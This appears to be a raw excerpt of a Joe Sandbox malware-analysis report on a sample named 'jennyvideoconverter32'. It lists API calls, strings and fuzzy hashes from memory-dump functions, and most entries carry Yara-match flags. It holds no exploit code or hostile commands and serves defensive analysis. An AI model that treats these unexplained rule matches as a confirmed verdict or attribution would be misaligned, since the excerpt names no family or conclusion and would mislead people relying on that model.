                                                                              • Part of subcall function 02E22341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02E22370
                                                                              • Part of subcall function 02E22341: GetLastError.KERNEL32 ref: 02E2237A
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 1856819132-0
                                                                            • Opcode ID: 22d2cdb7e9c98a563ee1d430a052795cbdc734a89014efd59afb50c091c7dd7a
                                                                            • Instruction ID: aca74a80c22c68229fdc2f98bf21eb04b10dce98750a5ef9e80827029c94a0b0
                                                                            • Opcode Fuzzy Hash: 22d2cdb7e9c98a563ee1d430a052795cbdc734a89014efd59afb50c091c7dd7a
                                                                            • Instruction Fuzzy Hash: 6611E472D80224DBCF11DFA5D8046AEFBBAFF04310F00951AF91AA2260DB3246A5DBC0
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E2229D
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02E222B0
                                                                            • TlsGetValue.KERNEL32 ref: 02E222E7
                                                                            • TlsSetValue.KERNEL32(?), ref: 02E22300
                                                                            • TlsSetValue.KERNEL32(?,?,?), ref: 02E2231C
                                                                              • Part of subcall function 02E22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02E22350
                                                                              • Part of subcall function 02E22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02E22360
                                                                              • Part of subcall function 02E22341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02E22370
                                                                              • Part of subcall function 02E22341: GetLastError.KERNEL32 ref: 02E2237A
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 1856819132-0
                                                                            • Opcode ID: f44997513bf5986bd8f5d2fc3fe3feae3c733c79a867f9aaa92fe42156228cc2
                                                                            • Instruction ID: 50a18ca2f98b8f2ec0c1a8274188dff9ce32b8ad5ff9ed1bc7e1ea26b9ef5049
                                                                            • Opcode Fuzzy Hash: f44997513bf5986bd8f5d2fc3fe3feae3c733c79a867f9aaa92fe42156228cc2
                                                                            • Instruction Fuzzy Hash: 53115E76D902299BCB05EFA5D8049AEFBBAEF54310F00851AF805A3260DB7159A5DF90
                                                                            APIs
                                                                              • Part of subcall function 02E2B098: __EH_prolog.LIBCMT ref: 02E2B09D
                                                                            • __CxxThrowException@8.LIBCMT ref: 02E2BC62
                                                                              • Part of subcall function 02E3449A: RaiseException.KERNEL32(?,?,02E2FA92,?,?,?,?,?,?,?,02E2FA92,?,02E50F78,?), ref: 02E344EF
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02E51D94,?,00000001), ref: 02E2BC78
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02E2BC8B
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02E51D94,?,00000001), ref: 02E2BC9B
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02E2BCA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                            • String ID:
                                                                            • API String ID: 2725315915-0
                                                                            • Opcode ID: 506d644170f098bffd9c2786d8ede8c2fcf02c89b5810391b06ac5edbf01d4d1
                                                                            • Instruction ID: c0ac16991e4b561b242825adf2eeaad93593d4288e29e893d97289a80390e013
                                                                            • Opcode Fuzzy Hash: 506d644170f098bffd9c2786d8ede8c2fcf02c89b5810391b06ac5edbf01d4d1
                                                                            • Instruction Fuzzy Hash: A101F9B6AC0314AFDB109FB0DC89F8677EDEB0436AF008818F616D7280DB60F8498B50
                                                                            APIs
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02E22432
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02E22445
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02E22454
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02E22469
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02E22470
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 747265849-0
                                                                            • Opcode ID: 21e1ea7e19fec07f4877a74a8d373fdf155c7e6f5386c4284d5b657e7326af19
                                                                            • Instruction ID: 758cbb087b0c65733be242a62dbfae3ec7c007978789e6d98032d40e5202a3bc
                                                                            • Opcode Fuzzy Hash: 21e1ea7e19fec07f4877a74a8d373fdf155c7e6f5386c4284d5b657e7326af19
                                                                            • Instruction Fuzzy Hash: EAF090766C1214BBDB009EA2ED49FD6B76CFB45711F804811F702D6480D770B966CBE0
                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02E21ED2
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02E21EEA
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02E21EF9
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02E21F0E
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02E21F15
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 830998967-0
                                                                            • Opcode ID: e7612f10ae264de415f8660ccda792d1b1ef26e7e58d649d8a6cff3516239b4b
                                                                            • Instruction ID: 4cf64020000ae84f161671e1b0e9f0fb7df223f85beb5a285e1dfd65aa4a6cac
                                                                            • Opcode Fuzzy Hash: e7612f10ae264de415f8660ccda792d1b1ef26e7e58d649d8a6cff3516239b4b
                                                                            • Instruction Fuzzy Hash: FDF09076582204BBD700AFA2EC48FD6BB6CFF05341F400411F60186441C770B566CBE0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: invalid string position$string too long
                                                                            • API String ID: 4104443479-4289949731
                                                                            • Opcode ID: dfb64473f0e08c993feb4f350e132adef6f1ef76e605edb1435d03aee7e33869
                                                                            • Instruction ID: a1c7423050b8ea711d20c8a58af96ebc868952fb1d8b1a1b1676a3c0da34c2c4
                                                                            • Opcode Fuzzy Hash: dfb64473f0e08c993feb4f350e132adef6f1ef76e605edb1435d03aee7e33869
                                                                            • Instruction Fuzzy Hash: E641C4313803249BDB24CE69DC84A56B7BAEB40718B00A92DF957C7781CB70E90CCBB0
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02E230C3
                                                                            • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02E23102
                                                                            • _memcmp.LIBCMT ref: 02E23141
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressErrorLastString_memcmp
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 1618111833-2422070025
                                                                            • Opcode ID: 87e4d47814cedc2492fd872697ba60fbddc9dcbb4ae843aa1778c00cb1c0b24b
                                                                            • Instruction ID: dd88e4238fb486eec872cd6abd48a80864506e4d5519184bf87e6a6dcad3c364
                                                                            • Opcode Fuzzy Hash: 87e4d47814cedc2492fd872697ba60fbddc9dcbb4ae843aa1778c00cb1c0b24b
                                                                            • Instruction Fuzzy Hash: 63312571A80324DFDB219F64C884B6EB7B2BF05318F10D5A9E86A57380DB359849CFA0
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E21F5B
                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02E21FC5
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 02E21FD2
                                                                              • Part of subcall function 02E21712: __EH_prolog.LIBCMT ref: 02E21717
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                            • String ID: iocp
                                                                            • API String ID: 998023749-976528080
                                                                            • Opcode ID: 9eeeeb7ef73faa26d0ea22fcf554d50c04122fefb33eb7dcbc7d02cdec721919
                                                                            • Instruction ID: 60cf5c87072602d1f608e1ca766eeb1d5e2f47deaf1ddf7a0cf2e8b002db9367
                                                                            • Opcode Fuzzy Hash: 9eeeeb7ef73faa26d0ea22fcf554d50c04122fefb33eb7dcbc7d02cdec721919
                                                                            • Instruction Fuzzy Hash: 4521E4B1941B449FC720DF6AD50455BFBF8FFA4720B108A1FE4A687A90D7B0A604CF91
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 02E33AA7
                                                                              • Part of subcall function 02E32EEC: __FF_MSGBANNER.LIBCMT ref: 02E32F03
                                                                              • Part of subcall function 02E32EEC: __NMSG_WRITE.LIBCMT ref: 02E32F0A
                                                                              • Part of subcall function 02E32EEC: RtlAllocateHeap.NTDLL(00AD0000,00000000,00000001), ref: 02E32F2F
                                                                            • std::exception::exception.LIBCMT ref: 02E33AC5
                                                                            • __CxxThrowException@8.LIBCMT ref: 02E33ADA
                                                                              • Part of subcall function 02E3449A: RaiseException.KERNEL32(?,?,02E2FA92,?,?,?,?,?,?,?,02E2FA92,?,02E50F78,?), ref: 02E344EF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                            • String ID: bad allocation
                                                                            • API String ID: 3074076210-2104205924
                                                                            • Opcode ID: de9f0f1f3766cfa06e97679f16495039ef4871709abeb20cbfc8c13327ec65cd
                                                                            • Instruction ID: 803ee6765c3427b02b1dcbd31dc94f42b9543ea55e2913a8172b4b6208ca99f9
                                                                            • Opcode Fuzzy Hash: de9f0f1f3766cfa06e97679f16495039ef4871709abeb20cbfc8c13327ec65cd
                                                                            • Instruction Fuzzy Hash: 77E0A03058020EAADF02EA60DC09DAFB7A9AB0031AF40E491FD1462180EB309A04CAE0
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E237B6
                                                                            • __localtime64.LIBCMT ref: 02E237C1
                                                                              • Part of subcall function 02E32540: __gmtime64_s.LIBCMT ref: 02E32553
                                                                            • std::exception::exception.LIBCMT ref: 02E237D9
                                                                              • Part of subcall function 02E32413: std::exception::_Copy_str.LIBCMT ref: 02E3242C
                                                                              • Part of subcall function 02E2A45B: __EH_prolog.LIBCMT ref: 02E2A460
                                                                              • Part of subcall function 02E2A45B: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02E2A46F
                                                                              • Part of subcall function 02E2A45B: __CxxThrowException@8.LIBCMT ref: 02E2A48E
                                                                            Strings
                                                                            • could not convert calendar time to UTC time, xrefs: 02E237CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                            • String ID: could not convert calendar time to UTC time
                                                                            • API String ID: 1963798777-2088861013
                                                                            • Opcode ID: 31bfbbdd5fd5296b771a26bf151b85ba526ce0da384fccd656a50f83f6f0c9fc
                                                                            • Instruction ID: 2390f6606a3a61ddbd9d0c576927007f0891cc7609c72bee0d886566d6ed7981
                                                                            • Opcode Fuzzy Hash: 31bfbbdd5fd5296b771a26bf151b85ba526ce0da384fccd656a50f83f6f0c9fc
                                                                            • Instruction Fuzzy Hash: 64E06DB2D8020A9BCB00EF90E8197AEB779EB14304F40D5A9EC15A2640EF345A0ACE95
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,00008000,00004000,771ADFF0,?,00000000), ref: 00404092
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004040ED
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 004040FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Free$Virtual$Heap
                                                                            • String ID: -@
                                                                            • API String ID: 2016334554-2999422947
                                                                            • Opcode ID: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                                            • Instruction ID: d55dda63c6158a3f001c35490e62a79414290c04420ce97baa52a0c06dad31a7
                                                                            • Opcode Fuzzy Hash: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                                            • Instruction Fuzzy Hash: D1B16C75A00205DFDB24CF04CA90AA9BBB1FB88314F24C1AED9196F396C735EE41CB84
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AdjustPointer_memmove
                                                                            • String ID:
                                                                            • API String ID: 1721217611-0
                                                                            • Opcode ID: 6ee8d560f40050b151dca8a44d140c993665b6803a7504207b12aab9d5c44d79
                                                                            • Instruction ID: b3046e2f4f0a439f5ebc5ce22063a7db6232a85ff865bd142a31f23bb9be4242
                                                                            • Opcode Fuzzy Hash: 6ee8d560f40050b151dca8a44d140c993665b6803a7504207b12aab9d5c44d79
                                                                            • Instruction Fuzzy Hash: CD41CB771847036ADB265E64D844BB633A59F01729F34F41FF849AA1E1DF71E580CE11
                                                                            APIs
                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02E24149), ref: 02E312FF
                                                                              • Part of subcall function 02E23FDC: __EH_prolog.LIBCMT ref: 02E23FE1
                                                                              • Part of subcall function 02E23FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02E23FF3
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02E312F4
                                                                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02E24149), ref: 02E31340
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02E24149), ref: 02E31411
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$Event$CreateH_prolog
                                                                            • String ID:
                                                                            • API String ID: 2825413587-0
                                                                            • Opcode ID: aa5e1bc89a308a6d2a94515f1fecb03132629d5ffed8be86ea2726f5f6edea3f
                                                                            • Instruction ID: ce42b581829a55f07350d5a6b501b739627f5b623786df359eadb71b82d85042
                                                                            • Opcode Fuzzy Hash: aa5e1bc89a308a6d2a94515f1fecb03132629d5ffed8be86ea2726f5f6edea3f
                                                                            • Instruction Fuzzy Hash: 85519F716803458BDB12DF28C88879A77E5BF4832DF16962CF86D9B290DB35D805CB91
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                            • String ID:
                                                                            • API String ID: 2782032738-0
                                                                            • Opcode ID: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                            • Instruction ID: 423680ab8d2a7a1604b9e07c6989a102e40c7a51e41be08ef433d8ceb4f461bd
                                                                            • Opcode Fuzzy Hash: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                            • Instruction Fuzzy Hash: 6141B7B5A407059BDB1A8F69C888DAF77B6AF4436AB14E2BDF815C7280D770D941CBC0
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02E3FE8B
                                                                            • __isleadbyte_l.LIBCMT ref: 02E3FEB9
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02E3FEE7
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02E3FF1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: cec08f9915cc97b30ff34b8558a72201bb0f7e6bbd7b1a0dcefef8189f1a1489
                                                                            • Instruction ID: 45bb757fb2a83d2f739ae7f8bbc387c2b960bd1987ed3f41517ebce06e627366
                                                                            • Opcode Fuzzy Hash: cec08f9915cc97b30ff34b8558a72201bb0f7e6bbd7b1a0dcefef8189f1a1489
                                                                            • Instruction Fuzzy Hash: F231C331A80246AFDB238E26C848BBA7BE9FF4132AF159069F858C7591D731D851CB90
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(FFFFFFFF,00001000,00004000,771ADFF0,?,00000000,?,-@,0040490E,00000010,00402FA3,?,?), ref: 004047F0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID: -@$r@$r@
                                                                            • API String ID: 1263568516-1251997348
                                                                            • Opcode ID: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
                                                                            • Instruction ID: a63ca1888fca441bf056fbcf5d5deb39584b298cc2094c54b415f4e68fc1e946
                                                                            • Opcode Fuzzy Hash: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
                                                                            • Instruction Fuzzy Hash: EE21A1B66003419BDB20AB24DD4476633A4EB81379F24CA3BDB65B66D0D378E941CB58
                                                                            APIs
                                                                            • htons.WS2_32(?), ref: 02E23DA2
                                                                              • Part of subcall function 02E23BD3: __EH_prolog.LIBCMT ref: 02E23BD8
                                                                              • Part of subcall function 02E23BD3: std::bad_exception::bad_exception.LIBCMT ref: 02E23BED
                                                                            • htonl.WS2_32(00000000), ref: 02E23DB9
                                                                            • htonl.WS2_32(00000000), ref: 02E23DC0
                                                                            • htons.WS2_32(?), ref: 02E23DD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                            • String ID:
                                                                            • API String ID: 3882411702-0
                                                                            • Opcode ID: fbcfea025bcb40c104bee52bb35454657ee6fa25863e78873d14fd1bff2a116c
                                                                            • Instruction ID: eb44700af9b70c36d99d50431b0608cd2140ace19fc4a5e448e88c6426dbdd41
                                                                            • Opcode Fuzzy Hash: fbcfea025bcb40c104bee52bb35454657ee6fa25863e78873d14fd1bff2a116c
                                                                            • Instruction Fuzzy Hash: CA11CE79A40209EFCF019F64D885A9AB7B9EF09314F00C496FD09DF205D771DA58CBA5
                                                                            APIs
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02E223D0
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02E223DE
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02E22401
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02E22408
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 4018804020-0
                                                                            • Opcode ID: 8e219b567d8c347665fede5bfbbdb10ec53023b15ebcb04ff74c49cc9a8af0d7
                                                                            • Instruction ID: f4f2bda631b1f088dfa9e8386f6c1a631dca96ee62eb69b1779dfab6a1cf1c4f
                                                                            • Opcode Fuzzy Hash: 8e219b567d8c347665fede5bfbbdb10ec53023b15ebcb04ff74c49cc9a8af0d7
                                                                            • Instruction Fuzzy Hash: 27110E31A80205ABDB109F61C984B66BBB8FF40708F00846DFA028B140E7B1F946CBA0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction ID: 85e0ad98efb718ec7fc7aba21d46e74fb22e17d38fcf21b9c88bdd78394e2e23
                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction Fuzzy Hash: E301303208014EBBCF136E94CC458EE3F66BB08759B68A416FE1865130D736C571EB81
                                                                            APIs
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02E224A9
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02E224B8
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02E224CD
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02E224D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 4018804020-0
                                                                            • Opcode ID: 21a6cd0ce99559dbcc76466fe106ee0ce21eff88868b406d5d17b485e6efefdb
                                                                            • Instruction ID: 9a3fc1d30cf225e9c3170d42bb3a0a7405cb70b82457b5bb76bd6819f30b7b35
                                                                            • Opcode Fuzzy Hash: 21a6cd0ce99559dbcc76466fe106ee0ce21eff88868b406d5d17b485e6efefdb
                                                                            • Instruction Fuzzy Hash: 18F01976581205AFDB009FAAE844F9ABBA8FF45711F408419FA05C6141D771A5618BE0
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E22009
                                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 02E22028
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02E22037
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02E2204E
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                            • String ID:
                                                                            • API String ID: 2456309408-0
                                                                            • Opcode ID: 5ca3a254066c07e72f2ba4f32017d0c905cf5249132c13171e9b895cfec575f5
                                                                            • Instruction ID: 2d28cb96730eb1ac4aca0cc5951c69a25a1bd4c5cabc5ef864a9597c609ae634
                                                                            • Opcode Fuzzy Hash: 5ca3a254066c07e72f2ba4f32017d0c905cf5249132c13171e9b895cfec575f5
                                                                            • Instruction Fuzzy Hash: DF01D1314816148FC728AF64F908BAAFBF4FF04708F00995EF94682590CBB06549CF90
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$H_prologSleep
                                                                            • String ID:
                                                                            • API String ID: 1765829285-0
                                                                            • Opcode ID: 3c8779d58216beb6a81ac73a1146fc903ee6aef79ac041a9ed5f8297c964433f
                                                                            • Instruction ID: 054534e1a5c958af4a18809339dab322ed64829f577bf299de837706e3c4b959
                                                                            • Opcode Fuzzy Hash: 3c8779d58216beb6a81ac73a1146fc903ee6aef79ac041a9ed5f8297c964433f
                                                                            • Instruction Fuzzy Hash: 40F05435681110DFCB009F95E8C8B88BBA4FF0D311F5081A9F619DB290CB759894CBA1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog_memmove
                                                                            • String ID: &'
                                                                            • API String ID: 3529519853-655172784
                                                                            • Opcode ID: f6efb48e992d24cd4ed7b04358a9b1afc063843e6d1a44b1be6b100831b6f7fd
